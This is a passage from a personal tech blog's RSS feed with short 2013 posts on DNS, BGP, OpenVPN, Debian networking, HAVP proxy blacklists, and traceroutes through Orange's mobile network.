  5652.    <pubDate>Sat, 01 Jun 2013 21:11:00 +0200</pubDate>
  5653.    <category domain="">Networking</category>
  5654.    <description><![CDATA[<p>After receiving yet another 'please login and click through our captcha for no reason' e-mail from a DynDNS provider, I decided to run my own DynDNS server.</p>
  5655. <p>As I already run my own DNS servers, this was just a matter of adding a dynamically updateable zone and writing a script which receives the IP change request via HTTP and sends out a DNS update.<br>
  5656. Luckily the <a href="" title="Perform Update - Dyn">DynDNS API</a> is quite well documented and I quickly came up with the PHP code below which performs the task well enough for me. Feel free to use it to run your own DynDNS server.</p>
  5657. <p>PS: to any friends reading this and looking for a DynDNS service: drop me a message and I'll set you up with an account.</p>
  5658. <script src=""></script>
  5659. ]]></description>
  5660.    <content:encoded><![CDATA[<p>After receiving yet another 'please login and click through our captcha for no reason' e-mail from a DynDNS provider, I decided to run my own DynDNS server.</p>
  5661. <p>As I already run my own DNS servers, this was just a matter of adding a dynamically updateable zone and writing a script which receives the IP change request via HTTP and sends out a DNS update.<br>
  5662. Luckily the <a href="" title="Perform Update - Dyn">DynDNS API</a> is quite well documented and I quickly came up with the PHP code below which performs the task well enough for me. Feel free to use it to run your own DynDNS server.</p>
  5663. <p>PS: to any friends reading this and looking for a DynDNS service: drop me a message and I'll set you up with an account.</p>
  5664. <script src=""></script>
  5665. ]]></content:encoded>
  5666.  </item>
  5668.  <item>
  5669.    <title></title>
  5670.    <link></link>
  5671.    <guid isPermaLink="true"></guid>
  5672.    <dc:creator>Andreas Jaggi</dc:creator>
  5673.    <creativeCommons:license></creativeCommons:license>
  5674.    <pubDate>Tue, 28 May 2013 18:37:00 +0200</pubDate>
  5675.    <category domain="">Networking</category>
  5676.    <description><![CDATA[<p>Get the <a href="" title="Domain Name System - Wikipedia">glue records</a> for a given domain:</p>
  5677. <script src=""></script>
  5678. ]]></description>
  5679.    <content:encoded><![CDATA[<p>Get the <a href="" title="Domain Name System - Wikipedia">glue records</a> for a given domain:</p>
  5680. <script src=""></script>
  5681. ]]></content:encoded>
  5682.  </item>
  5684.  <item>
  5685.    <title></title>
  5686.    <link></link>
  5687.    <guid isPermaLink="true"></guid>
  5688.    <dc:creator>Andreas Jaggi</dc:creator>
  5689.    <creativeCommons:license></creativeCommons:license>
  5690.    <pubDate>Sun, 26 May 2013 08:29:00 +0200</pubDate>
  5691.    <category domain="">Networking</category>
  5692.    <description><![CDATA[<p>Update the serial number in BIND zone files with the current unix timestamp.</p>
  5693. <script src=""></script>
  5694. ]]></description>
  5695.    <content:encoded><![CDATA[<p>Update the serial number in BIND zone files with the current unix timestamp.</p>
  5696. <script src=""></script>
  5697. ]]></content:encoded>
  5698.  </item>
  5700.  <item>
  5701.    <title>less with colors</title>
  5702.    <link></link>
  5703.    <guid isPermaLink="true"></guid>
  5704.    <dc:creator>Andreas Jaggi</dc:creator>
  5705.    <creativeCommons:license></creativeCommons:license>
  5706.    <pubDate>Sat, 25 May 2013 19:29:00 +0200</pubDate>
  5707.    <category domain="">Linux</category>
  5708.    <description><![CDATA[<p>For a long time it annoyed me every time that less only showed ASCII codes instead of colors when piping some 'color-enabled' output into it.</p>
  5709. <p>Turns out there is an easy fix for that:</p>
  5710. <pre>colordiff a/foo b/foo | less -R</pre>
  5711. <p>Thanks to <a href="" title="Handling terminal color escape sequences in less |">Major Hayden</a> for this very useful tip!</p>
  5712. ]]></description>
  5713.    <content:encoded><![CDATA[<p>For a long time it annoyed me every time that less only showed ASCII codes instead of colors when piping some 'color-enabled' output into it.</p>
  5714. <p>Turns out there is an easy fix for that:</p>
  5715. <pre>colordiff a/foo b/foo | less -R</pre>
  5716. <p>Thanks to <a href="" title="Handling terminal color escape sequences in less |">Major Hayden</a> for this very useful tip!</p>
  5717. ]]></content:encoded>
  5718.  </item>
  5720.  <item>
  5721.    <title>Howto generate DH parameters for OpenVPN</title>
  5722.    <link></link>
  5723.    <guid isPermaLink="true"></guid>
  5724.    <dc:creator>Andreas Jaggi</dc:creator>
  5725.    <creativeCommons:license></creativeCommons:license>
  5726.    <pubDate>Wed, 27 Feb 2013 18:29:00 +0100</pubDate>
  5727.    <category domain="">Linux</category>
  5728.    <description><![CDATA[<pre>openssl gendh -out dh4096.pem 4096</pre>
  5729. ]]></description>
  5730.    <content:encoded><![CDATA[<pre>openssl gendh -out dh4096.pem 4096</pre>
  5731. ]]></content:encoded>
  5732.  </item>
  5734.  <item>
  5735.    <title>Orange Routing 2</title>
  5736.    <link></link>
  5737.    <guid isPermaLink="true"></guid>
  5738.    <dc:creator>Andreas Jaggi</dc:creator>
  5739.    <creativeCommons:license></creativeCommons:license>
  5740.    <pubDate>Mon, 25 Feb 2013 13:20:00 +0100</pubDate>
  5741.    <category domain="">Networking</category>
  5742.    <description><![CDATA[<p>I did another test of the <a href="" title="x-log - Orange Routing">Orange Routing</a>.<br>Running a traceroute to my server in Zurich and one to my vhost in Frankfurt.<br>First another version of the already familier traceroute to my server in Zurich:</p>
  5743. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  5744.  1.|--                0.0%     5    8.0   3.7   2.1   8.0   2.5
  5745.  2.|--                  0.0%     5  174.8 114.9  56.7 205.6  69.8
  5746.  3.|--                 0.0%     5  126.8 108.4  67.7 171.3  42.8
  5747.  4.|--            0.0%     5   73.4  82.7  61.9 111.5  20.5
  5748.  5.|--            0.0%     5   54.0  64.9  54.0  75.9   9.3
  5749.  6.|--            0.0%     5   64.7  69.2  57.3  79.2   8.4
  5750.  7.|--                0.0%     5   56.8  65.5  56.8  72.1   7.7
  5751.  8.|--               0.0%     5   65.9  87.3  60.1 146.6  35.1
  5752.  9.|-- pos0-1-1-1.gencr1.geneve.  0.0%     5   84.8 117.1  76.4 162.5  36.9
  5753. 10.|--  0.0%     5   88.1 118.0  88.1 168.3  36.7
  5754. 11.|--  0.0%     5   76.5  90.5  76.5 109.1  12.0
  5755. 12.|-- so-2-3-0.xt2.zur3.alter.n  0.0%     5   76.8 109.1  76.8 203.2  53.1
  5756. 13.|--  0.0%     5   88.8  98.7  84.3 143.4  25.2
  5757. 14.|-- uch200193-gw.customer.alt  0.0%     5   90.7  85.3  74.1  93.5   8.0
  5758. 15.|--            0.0%     5   88.9  97.7  88.9 104.7   6.3
  5759. 16.|--              0.0%     5   90.8  94.8  90.8 102.8   4.9
  5760. 17.|--           20.0%     5  234.8 130.0  92.8 234.8  69.9</pre>
  5761. <p>Now the traceroute to the vhost in Frankfurt:</p>
  5762. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  5763.  1.|--                0.0%     5   15.2  13.1   1.9  44.5  18.4
  5764.  2.|--                 0.0%     5   72.6  74.0  67.2  81.3   6.8
  5765.  3.|--                 0.0%     5   80.7  75.0  64.0  89.6  10.3
  5766.  4.|--            0.0%     5   65.1  78.9  65.1  94.0  12.3
  5767.  5.|--            0.0%     5   73.1  70.4  66.5  73.3   2.8
  5768.  6.|--            0.0%     5   69.5  73.9  66.3  86.6   7.7
  5769.  7.|--                0.0%     5   67.0  72.7  67.0  80.0   4.9
  5770.  8.|--               0.0%     5   70.9  74.4  69.7  86.4   7.0
  5771.  9.|-- pos0-1-1-1.gencr1.geneve.  0.0%     5   77.2  83.4  75.9  99.4   9.4
  5772. 10.|-- pos3-1-0.zurcr1.zurich.op  0.0%     5   83.8 103.2  83.8 146.9  26.3
  5773. 11.|-- pos0-9-4-0.ffttr1.frankfu  0.0%     5  102.9 103.6  98.7 108.8   4.9
  5774. 12.|--  0.0%     5   87.6  88.8  85.3  93.2   3.0
  5775. 13.|-- te3-1.core-2.fra.leaseweb  0.0%     5   85.4  91.5  85.4 106.1   8.5
  5776. 14.|--     0.0%     5   90.2  94.1  84.7 112.5  11.0
  5777. 15.|-- ???                       100.0     5    0.0   0.0   0.0   0.0   0.0
  5778. 16.|--              20.0%     5   89.9 117.5  86.3 205.5  58.7</pre>
  5779. <p>As you can see, the RTT is higher for the server in Zurich than for the vhost in Frankfurt! (keep in mind that source of these measurement is my laptop in the train 8 minutes away from Zurich now)</p>
  5780. <p>So Orange has higher latency to hosts in the same region/city than to hosts in another country which are more than 350km away. :-(<br>The next time I choose a mobile provider it might be good to analyse its BGP peerings and routing policies first...</p>
  5781. ]]></description>
  5782.    <content:encoded><![CDATA[<p>I did another test of the <a href="" title="x-log - Orange Routing">Orange Routing</a>.<br>Running a traceroute to my server in Zurich and one to my vhost in Frankfurt.<br>First another version of the already familier traceroute to my server in Zurich:</p>
  5783. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  5784.  1.|--                0.0%     5    8.0   3.7   2.1   8.0   2.5
  5785.  2.|--                  0.0%     5  174.8 114.9  56.7 205.6  69.8
  5786.  3.|--                 0.0%     5  126.8 108.4  67.7 171.3  42.8
  5787.  4.|--            0.0%     5   73.4  82.7  61.9 111.5  20.5
  5788.  5.|--            0.0%     5   54.0  64.9  54.0  75.9   9.3
  5789.  6.|--            0.0%     5   64.7  69.2  57.3  79.2   8.4
  5790.  7.|--                0.0%     5   56.8  65.5  56.8  72.1   7.7
  5791.  8.|--               0.0%     5   65.9  87.3  60.1 146.6  35.1
  5792.  9.|-- pos0-1-1-1.gencr1.geneve.  0.0%     5   84.8 117.1  76.4 162.5  36.9
  5793. 10.|--  0.0%     5   88.1 118.0  88.1 168.3  36.7
  5794. 11.|--  0.0%     5   76.5  90.5  76.5 109.1  12.0
  5795. 12.|-- so-2-3-0.xt2.zur3.alter.n  0.0%     5   76.8 109.1  76.8 203.2  53.1
  5796. 13.|--  0.0%     5   88.8  98.7  84.3 143.4  25.2
  5797. 14.|-- uch200193-gw.customer.alt  0.0%     5   90.7  85.3  74.1  93.5   8.0
  5798. 15.|--            0.0%     5   88.9  97.7  88.9 104.7   6.3
  5799. 16.|--              0.0%     5   90.8  94.8  90.8 102.8   4.9
  5800. 17.|--           20.0%     5  234.8 130.0  92.8 234.8  69.9</pre>
  5801. <p>Now the traceroute to the vhost in Frankfurt:</p>
  5802. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  5803.  1.|--                0.0%     5   15.2  13.1   1.9  44.5  18.4
  5804.  2.|--                 0.0%     5   72.6  74.0  67.2  81.3   6.8
  5805.  3.|--                 0.0%     5   80.7  75.0  64.0  89.6  10.3
  5806.  4.|--            0.0%     5   65.1  78.9  65.1  94.0  12.3
  5807.  5.|--            0.0%     5   73.1  70.4  66.5  73.3   2.8
  5808.  6.|--            0.0%     5   69.5  73.9  66.3  86.6   7.7
  5809.  7.|--                0.0%     5   67.0  72.7  67.0  80.0   4.9
  5810.  8.|--               0.0%     5   70.9  74.4  69.7  86.4   7.0
  5811.  9.|-- pos0-1-1-1.gencr1.geneve.  0.0%     5   77.2  83.4  75.9  99.4   9.4
  5812. 10.|-- pos3-1-0.zurcr1.zurich.op  0.0%     5   83.8 103.2  83.8 146.9  26.3
  5813. 11.|-- pos0-9-4-0.ffttr1.frankfu  0.0%     5  102.9 103.6  98.7 108.8   4.9
  5814. 12.|--  0.0%     5   87.6  88.8  85.3  93.2   3.0
  5815. 13.|-- te3-1.core-2.fra.leaseweb  0.0%     5   85.4  91.5  85.4 106.1   8.5
  5816. 14.|--     0.0%     5   90.2  94.1  84.7 112.5  11.0
  5817. 15.|-- ???                       100.0     5    0.0   0.0   0.0   0.0   0.0
  5818. 16.|--              20.0%     5   89.9 117.5  86.3 205.5  58.7</pre>
  5819. <p>As you can see, the RTT is higher for the server in Zurich than for the vhost in Frankfurt! (keep in mind that source of these measurement is my laptop in the train 8 minutes away from Zurich now)</p>
  5820. <p>So Orange has higher latency to hosts in the same region/city than to hosts in another country which are more than 350km away. :-(<br>The next time I choose a mobile provider it might be good to analyse its BGP peerings and routing policies first...</p>
  5821. ]]></content:encoded>
  5822.  </item>
  5824.  <item>
  5825.    <title>Orange Routing</title>
  5826.    <link></link>
  5827.    <guid isPermaLink="true"></guid>
  5828.    <dc:creator>Andreas Jaggi</dc:creator>
  5829.    <creativeCommons:license></creativeCommons:license>
  5830.    <pubDate>Mon, 25 Feb 2013 12:34:00 +0100</pubDate>
  5831.    <category domain="">Networking</category>
  5832.    <description><![CDATA[<p>While in the train from Bern to Zurich, I did a traceroute towards the server which currently hosts this weblog (it is located at <a href="" title="Open Systems">Open Systems</a> in Zurich). The connection starts on my laptop and is thethered via my cell to the Orange backbone.</p>
  5833. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  5834.  1.|--                0.0%     5    2.0  12.1   1.7  33.2  14.6
  5835.  2.|--                  0.0%     5   52.2 373.4  52.2 1241. 504.8
  5836.  3.|--                 0.0%     5   50.9 347.4  50.9 1143. 453.3
  5837.  4.|--            0.0%     5   51.2 282.7  51.2 1042. 426.8
  5838.  5.|--            0.0%     5   51.2 226.2  44.5 942.2 400.3
  5839.  6.|--            0.0%     5   51.4 206.7  37.9 847.5 358.2
  5840.  7.|--                0.0%     5   50.0 181.4  29.6 746.9 316.2
  5841.  8.|--               0.0%     5   50.0 172.2  36.9 645.6 264.9
  5842.  9.|--            0.0%     4   60.2  59.8  46.2  81.9  15.8
  5843. 10.|--             0.0%     4   70.0  76.4  64.9 101.6  16.9
  5844. 11.|--             0.0%     4   70.4  74.0  69.2  83.8   6.7
  5845. 12.|--                0.0%     4   70.6  71.7  58.1  88.1  12.3
  5846. 13.|--              0.0%     4   70.5  61.9  51.6  70.9  10.2
  5847. 14.|--              0.0%     4   71.3  69.2  58.8  75.4   7.2
  5848. 15.|--             0.0%     4   71.5  78.3  62.6 108.9  20.7
  5849. 16.|--              0.0%     4   72.2  75.2  70.4  81.9   5.1
  5850. 17.|--           25.0%     4   80.8  76.2  61.2  86.5  13.3</pre>
  5851. <p>You can see that the traffic is passed through 8 different routers inside the Orange backbone (using IPs from all three RFC1918 ranges...) before it is let onto the Internet.<br>
  5852. And then the real fun starts (let's use DNS names for this):</p>
  5853. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  5854.  1.|--                0.0%     5    2.0  12.2   1.9  33.3  14.5
  5855.  2.|--                  0.0%     5   44.2 345.6  27.0 1167. 494.2
  5856.  3.|--                 0.0%     5   52.2 308.9  27.0 1104. 462.4
  5857.  4.|--            0.0%     5   33.4 264.9  27.2 1014. 427.1
  5858.  5.|--            0.0%     5   30.3 227.5  27.3 952.9 406.4
  5859.  6.|--            0.0%     5   50.4 200.7  27.0 860.0 368.7
  5860.  7.|--                0.0%     5   72.4 193.5  30.5 779.2 327.8
  5861.  8.|--               0.0%     5   31.8 166.8  27.6 688.0 291.5
  5862.  9.|-- pos0-1-1-1.gencr1.geneve.  0.0%     4   50.8  55.0  47.6  67.1   8.6
  5863. 10.|--  0.0%     4   61.0  64.4  57.7  78.5   9.5
  5864. 11.|--  0.0%     4   70.8  56.3  48.4  70.8   9.9
  5865. 12.|-- so-2-3-0.xt2.zur3.alter.n  0.0%     4  108.9  65.6  48.0 108.9  29.2
  5866. 13.|--  0.0%     4   51.7  55.5  50.3  68.8   8.8
  5867. 14.|-- uch200193-gw.customer.alt  0.0%     4  171.8  83.6  50.7 171.8  58.8
  5868. 15.|--            0.0%     4  132.1  90.0  59.2 132.1  32.7
  5869. 16.|--              0.0%     4   72.4  66.8  58.6  73.5   7.3
  5870. 17.|--           25.0%     4   80.2  64.7  56.2  80.2  13.4</pre>
  5871. <p>As we see, Orange injects their mobile data traffic into the Internet in Geneva (pos0-1-1-1.gencr1.geneve.).<br>
  5872. Then it is first sent to Paris ( and and from there back to Zurich (so-2-3-0.xt2.yur3.alter.n and all the following hosts).</p>
  5873. <p>I can kind of understand that the traffic is routed via Geneva (main Orange infrastructure is there), but why is it sent to Paris? (especially since Geneva&lt;-&gt;Zurich is the main Internet connection inside Switzerland where most of the countries fiber is buried).</p>
  5874. <p>I guess this explains why my mobile data speed is not always as fast as I like it to be...</p>
  5875. ]]></description>
  5876.    <content:encoded><![CDATA[<p>While in the train from Bern to Zurich, I did a traceroute towards the server which currently hosts this weblog (it is located at <a href="" title="Open Systems">Open Systems</a> in Zurich). The connection starts on my laptop and is thethered via my cell to the Orange backbone.</p>
  5877. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  5878.  1.|--                0.0%     5    2.0  12.1   1.7  33.2  14.6
  5879.  2.|--                  0.0%     5   52.2 373.4  52.2 1241. 504.8
  5880.  3.|--                 0.0%     5   50.9 347.4  50.9 1143. 453.3
  5881.  4.|--            0.0%     5   51.2 282.7  51.2 1042. 426.8
  5882.  5.|--            0.0%     5   51.2 226.2  44.5 942.2 400.3
  5883.  6.|--            0.0%     5   51.4 206.7  37.9 847.5 358.2
  5884.  7.|--                0.0%     5   50.0 181.4  29.6 746.9 316.2
  5885.  8.|--               0.0%     5   50.0 172.2  36.9 645.6 264.9
  5886.  9.|--            0.0%     4   60.2  59.8  46.2  81.9  15.8
  5887. 10.|--             0.0%     4   70.0  76.4  64.9 101.6  16.9
  5888. 11.|--             0.0%     4   70.4  74.0  69.2  83.8   6.7
  5889. 12.|--                0.0%     4   70.6  71.7  58.1  88.1  12.3
  5890. 13.|--              0.0%     4   70.5  61.9  51.6  70.9  10.2
  5891. 14.|--              0.0%     4   71.3  69.2  58.8  75.4   7.2
  5892. 15.|--             0.0%     4   71.5  78.3  62.6 108.9  20.7
  5893. 16.|--              0.0%     4   72.2  75.2  70.4  81.9   5.1
  5894. 17.|--           25.0%     4   80.8  76.2  61.2  86.5  13.3</pre>
  5895. <p>You can see that the traffic is passed through 8 different routers inside the Orange backbone (using IPs from all three RFC1918 ranges...) before it is let onto the Internet.<br>
  5896. And then the real fun starts (let's use DNS names for this):</p>
  5897. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  5898.  1.|--                0.0%     5    2.0  12.2   1.9  33.3  14.5
  5899.  2.|--                  0.0%     5   44.2 345.6  27.0 1167. 494.2
  5900.  3.|--                 0.0%     5   52.2 308.9  27.0 1104. 462.4
  5901.  4.|--            0.0%     5   33.4 264.9  27.2 1014. 427.1
  5902.  5.|--            0.0%     5   30.3 227.5  27.3 952.9 406.4
  5903.  6.|--            0.0%     5   50.4 200.7  27.0 860.0 368.7
  5904.  7.|--                0.0%     5   72.4 193.5  30.5 779.2 327.8
  5905.  8.|--               0.0%     5   31.8 166.8  27.6 688.0 291.5
  5906.  9.|-- pos0-1-1-1.gencr1.geneve.  0.0%     4   50.8  55.0  47.6  67.1   8.6
  5907. 10.|--  0.0%     4   61.0  64.4  57.7  78.5   9.5
  5908. 11.|--  0.0%     4   70.8  56.3  48.4  70.8   9.9
  5909. 12.|-- so-2-3-0.xt2.zur3.alter.n  0.0%     4  108.9  65.6  48.0 108.9  29.2
  5910. 13.|--  0.0%     4   51.7  55.5  50.3  68.8   8.8
  5911. 14.|-- uch200193-gw.customer.alt  0.0%     4  171.8  83.6  50.7 171.8  58.8
  5912. 15.|--            0.0%     4  132.1  90.0  59.2 132.1  32.7
  5913. 16.|--              0.0%     4   72.4  66.8  58.6  73.5   7.3
  5914. 17.|--           25.0%     4   80.2  64.7  56.2  80.2  13.4</pre>
  5915. <p>As we see, Orange injects their mobile data traffic into the Internet in Geneva (pos0-1-1-1.gencr1.geneve.).<br>
  5916. Then it is first sent to Paris ( and and from there back to Zurich (so-2-3-0.xt2.yur3.alter.n and all the following hosts).</p>
  5917. <p>I can kind of understand that the traffic is routed via Geneva (main Orange infrastructure is there), but why is it sent to Paris? (especially since Geneva&lt;-&gt;Zurich is the main Internet connection inside Switzerland where most of the countries fiber is buried).</p>
  5918. <p>I guess this explains why my mobile data speed is not always as fast as I like it to be...</p>
  5919. ]]></content:encoded>
  5920.  </item>
  5922.  <item>
  5923.    <title>Administrative Distance</title>
  5924.    <link></link>
  5925.    <guid isPermaLink="true"></guid>
  5926.    <dc:creator>Andreas Jaggi</dc:creator>
  5927.    <creativeCommons:license></creativeCommons:license>
  5928.    <pubDate>Mon, 18 Feb 2013 08:39:00 +0100</pubDate>
  5929.    <category domain="">Networking</category>
  5930.    <description><![CDATA[<p>When using more than one dynamic routing protocol, make sure to know their <a href="" title="Administrative distance">administrative distance</a>.</p>
  5931. <p>Further it is usually a bad idea to redistribute routes from a dynamic routing protocol into another one with a lower administrative distance. Especially when having multiple handover points between the two protocols.</p>
  5932. ]]></description>
  5933.    <content:encoded><![CDATA[<p>When using more than one dynamic routing protocol, make sure to know their <a href="" title="Administrative distance">administrative distance</a>.</p>
  5934. <p>Further it is usually a bad idea to redistribute routes from a dynamic routing protocol into another one with a lower administrative distance. Especially when having multiple handover points between the two protocols.</p>
  5935. ]]></content:encoded>
  5936.  </item>
  5938.  <item>
  5939.    <title>I ♡ snow</title>
  5940.    <link></link>
  5941.    <guid isPermaLink="true"></guid>
  5942.    <dc:creator>Andreas Jaggi</dc:creator>
  5943.    <creativeCommons:license></creativeCommons:license>
  5944.    <pubDate>Sun, 17 Feb 2013 17:31:00 +0100</pubDate>
  5945.    <category domain="">Misc</category>
  5946.    <description><![CDATA[<p><a href="" title="I ♡ snow"><img alt="I love snow" src="" height="164" width="507" title="I ♡ snow"></a></p>
  5947. ]]></description>
  5948.    <content:encoded><![CDATA[<p><a href="" title="I ♡ snow"><img alt="I love snow" src="" height="164" width="507" title="I ♡ snow"></a></p>
  5949. ]]></content:encoded>
  5950.  </item>
  5952.  <item>
  5953.    <title>Computer Science</title>
  5954.    <link></link>
  5955.    <guid isPermaLink="true"></guid>
  5956.    <dc:creator>Andreas Jaggi</dc:creator>
  5957.    <creativeCommons:license></creativeCommons:license>
  5958.    <pubDate>Thu, 14 Feb 2013 18:07:00 +0100</pubDate>
  5959.    <category domain="">Misc</category>
  5960.    <description><![CDATA[<p><img src="" height="371" width="497" alt="Computer Science"><br>via <a href="" title="Photo of the Computer Science section at Barnes and Noble"></a></p>
  5961. ]]></description>
  5962.    <content:encoded><![CDATA[<p><img src="" height="371" width="497" alt="Computer Science"><br>via <a href="" title="Photo of the Computer Science section at Barnes and Noble"></a></p>
  5963. ]]></content:encoded>
  5964.  </item>
  5966.  <item>
  5967.    <title>Updated HAVP blacklist script</title>
  5968.    <link></link>
  5969.    <guid isPermaLink="true"></guid>
  5970.    <dc:creator>Andreas Jaggi</dc:creator>
  5971.    <creativeCommons:license></creativeCommons:license>
  5972.    <pubDate>Wed, 13 Feb 2013 18:02:00 +0100</pubDate>
  5973.    <category domain="">Linux</category>
  5974.    <description><![CDATA[<p>The <a href="">HAVP blacklist script</a> chocked on some entries from <a href="" title="PhishTank">PhishTank</a>. These issues have been fixed with some more sed magic and I've put and updated version of the script on <a href="" title="">Github</a>.</p>
  5975. <script src=""></script>
  5976. ]]></description>
  5977.    <content:encoded><![CDATA[<p>The <a href="">HAVP blacklist script</a> chocked on some entries from <a href="" title="PhishTank">PhishTank</a>. These issues have been fixed with some more sed magic and I've put and updated version of the script on <a href="" title="">Github</a>.</p>
  5978. <script src=""></script>
  5979. ]]></content:encoded>
  5980.  </item>
  5982.  <item>
  5983.    <title>Verify a BGP MD5 password before session turnup</title>
  5984.    <link></link>
  5985.    <guid isPermaLink="true"></guid>
  5986.    <dc:creator>Andreas Jaggi</dc:creator>
  5987.    <creativeCommons:license></creativeCommons:license>
  5988.    <pubDate>Wed, 13 Feb 2013 09:02:00 +0100</pubDate>
  5989.    <category domain="">Networking</category>
  5990.    <description><![CDATA[<p>When setting up a new BGP peering, you may want to test if your peering partner uses the correct MD5 password without bringing up your side of the session.<br>
  5991. For this the <a href="" title="TCPDUMP">tcpdump</a> option <var>-M</var> can be used to supply the MD5 password when sniffing the traffic of the new peer:</p>
  5992. <pre>tcpdump -ni eth0 -M MyBgPMd5PaSsWoRd tcp port 179</pre>
  5993. <p>tcpdump will then verify the MD5 signature for every packet where it finds a MD5 signature TCP option as specified in <a href="" title="RFC2385">RFC2385</a>.
  5994. <br>
  5995. In the output you will see <var>md5valid</var> for packets where your password matches the MD5 signature or <var>md5invalid</var> for packets where your password does not match the MD5 signature.<br>If you see neither <var>md5valid</var> nor <var>md5invalid</var> then the peer did not configure any MD5 BGP password.</p>
  5996. <p>If you want to check for mismatching MD5 passwords after you bring up the BGP session, just look into the kernel log. Linux reports invalid MD5 TCP signatures like this:</p>
  5997. <pre>MD5 Hash failed for (, 56789)-&gt;(, 179)</pre>
  5998. ]]></description>
  5999.    <content:encoded><![CDATA[<p>When setting up a new BGP peering, you may want to test if your peering partner uses the correct MD5 password without bringing up your side of the session.<br>
  6000. For this the <a href="" title="TCPDUMP">tcpdump</a> option <var>-M</var> can be used to supply the MD5 password when sniffing the traffic of the new peer:</p>
  6001. <pre>tcpdump -ni eth0 -M MyBgPMd5PaSsWoRd tcp port 179</pre>
  6002. <p>tcpdump will then verify the MD5 signature for every packet where it finds a MD5 signature TCP option as specified in <a href="" title="RFC2385">RFC2385</a>.
  6003. <br>
  6004. In the output you will see <var>md5valid</var> for packets where your password matches the MD5 signature or <var>md5invalid</var> for packets where your password does not match the MD5 signature.<br>If you see neither <var>md5valid</var> nor <var>md5invalid</var> then the peer did not configure any MD5 BGP password.</p>
  6005. <p>If you want to check for mismatching MD5 passwords after you bring up the BGP session, just look into the kernel log. Linux reports invalid MD5 TCP signatures like this:</p>
  6006. <pre>MD5 Hash failed for (, 56789)-&gt;(, 179)</pre>
  6007. ]]></content:encoded>
  6008.  </item>
  6010.  <item>
  6011.    <title>Configure unattached Bridge Interfaces in Debian</title>
  6012.    <link></link>
  6013.    <guid isPermaLink="true"></guid>
  6014.    <dc:creator>Andreas Jaggi</dc:creator>
  6015.    <creativeCommons:license></creativeCommons:license>
  6016.    <pubDate>Tue, 05 Feb 2013 08:42:00 +0100</pubDate>
  6017.    <category domain="">Linux</category>
  6018.    <description><![CDATA[<p>When working with virtualization technologies like KVM on Debian, you might need to configure bridge interfaces which are not attached to a physical interfaces (for example for a non-routed management network or similar).<br>
  6019. Debian uses the directive <var>bridge_ports</var> in <var>/etc/network/interfaces</var> to indicate whether an interface is a bridge interface or not.
  6020. The syntax checker does not accept an empty <var>bridge_ports</var> directive since he expects a list of physical interfaces to attach to the bridge interface.</p>
  6021. <p>When needing a bridge interface without any physical interfaces attached, usually people configure this interface by hand or with a special script.<br>
  6022. Since I manage <var>/etc/network/interfaces</var> with <a href="" title="puppet-interfaces">my Puppet module</a>, I would like to use it to configure all network interfaces including the unattached bridge interfaces.<br>
  6023. It turns out that this can be done by passing <var>none</var> as parameter for the <var>bridge_ports</var> directive like this:
  6024. </p>
  6025. <pre>interface br0 inet static
  6026. address
  6027. netmask
  6028. bridge_ports none</pre>
  6029. ]]></description>
  6030.    <content:encoded><![CDATA[<p>When working with virtualization technologies like KVM on Debian, you might need to configure bridge interfaces which are not attached to a physical interfaces (for example for a non-routed management network or similar).<br>
  6031. Debian uses the directive <var>bridge_ports</var> in <var>/etc/network/interfaces</var> to indicate whether an interface is a bridge interface or not.
  6032. The syntax checker does not accept an empty <var>bridge_ports</var> directive since he expects a list of physical interfaces to attach to the bridge interface.</p>
  6033. <p>When needing a bridge interface without any physical interfaces attached, usually people configure this interface by hand or with a special script.<br>
  6034. Since I manage <var>/etc/network/interfaces</var> with <a href="" title="puppet-interfaces">my Puppet module</a>, I would like to use it to configure all network interfaces including the unattached bridge interfaces.<br>
  6035. It turns out that this can be done by passing <var>none</var> as parameter for the <var>bridge_ports</var> directive like this:
  6036. </p>
  6037. <pre>interface br0 inet static
  6038. address
  6039. netmask
  6040. bridge_ports none</pre>
  6041. ]]></content:encoded>
  6042.  </item>
  6044.  <item>
  6045.    <title>Nice-looking templates for HAVP</title>
  6046.    <link></link>
  6047.    <guid isPermaLink="true"></guid>
  6048.    <dc:creator>Andreas Jaggi</dc:creator>
  6049.    <creativeCommons:license></creativeCommons:license>
  6050.    <pubDate>Sat, 05 Jan 2013 00:14:00 +0100</pubDate>
  6051.    <category domain="">Linux</category>
  6052.    <description><![CDATA[<p>Since the default templates of HAVP look like being stuck in the 90's, I created some nice-looking templates.<br>
  6053. You can download them from GitHub: <a href="" title="x-way/havp-templates"></a><br>Currently there is only the german version, feel free to send me a pull-request with another translation :-)</p>
  6054. <p><a href=""><img src="" alt="havp-templates screenshot" width="306" height="116"></a></p>
  6055. ]]></description>
  6056.    <content:encoded><![CDATA[<p>Since the default templates of HAVP look like being stuck in the 90's, I created some nice-looking templates.<br>
  6057. You can download them from GitHub: <a href="" title="x-way/havp-templates"></a><br>Currently there is only the german version, feel free to send me a pull-request with another translation :-)</p>
  6058. <p><a href=""><img src="" alt="havp-templates screenshot" width="306" height="116"></a></p>
  6059. ]]></content:encoded>
  6060.  </item>
  6062.  <item>
  6063.    <title>HAVP PhishTank and Adserver Blacklist</title>
  6064.    <link></link>
  6065.    <guid isPermaLink="true"></guid>
  6066.    <dc:creator>Andreas Jaggi</dc:creator>
  6067.    <creativeCommons:license></creativeCommons:license>
  6068.    <pubDate>Tue, 01 Jan 2013 12:50:00 +0100</pubDate>
  6069.    <category domain="">Linux</category>
  6070.    <description><![CDATA[<p>For basic virus protection I'm running a proxy with <a href="" title="HTTP Anti-Virus Proxy">HAVP</a> and <a href="" title="Clam AntiVirus">ClamAV</a>.<br>
  6071. Since some time I was using HAVPs blacklist functionality to block Ads (by blacklisting * and *
  6072. As such a manual blacklist is not very efficient I wanted to have an auto-updating list of adservers, thus I started to write the shellscript below which generates an up-to-date blacklist based on the adserverlist from <a href="" title=""></a>.</p>
  6073. <p>Shortly after this I extended the script to also incorporate a Phising blacklist based on the data from <a href="" title="PhishTank">PhishTank</a>.<br>
